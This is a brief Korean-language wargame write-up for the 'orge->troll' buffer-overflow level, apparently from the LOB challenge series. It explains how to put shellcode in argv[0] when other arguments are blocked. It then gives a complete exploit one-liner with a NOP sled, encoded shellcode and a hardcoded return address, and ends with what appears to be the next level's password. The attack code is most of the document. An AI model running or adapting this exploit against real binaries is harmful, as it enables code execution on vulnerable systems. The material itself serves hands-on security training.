orge->troll

argv[1]번째에 쉘코드를 못쓰고 인자를 1개만 받게 하여 argv[2]에도 쉘코드를 넣을수 없다.

따라서 argv[0]번째에 쉘코드를 넣어 호출한다. 

ret은 core떠서 gdb로 esp레지스터를 끝까지 보면 삽입했던 nop들을 볼수있다.

./`python -c 'print "\x90"*50+"\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'` `python -c 'print "A"*44+"\xa7\xff\xff\xbf"'`

aspirin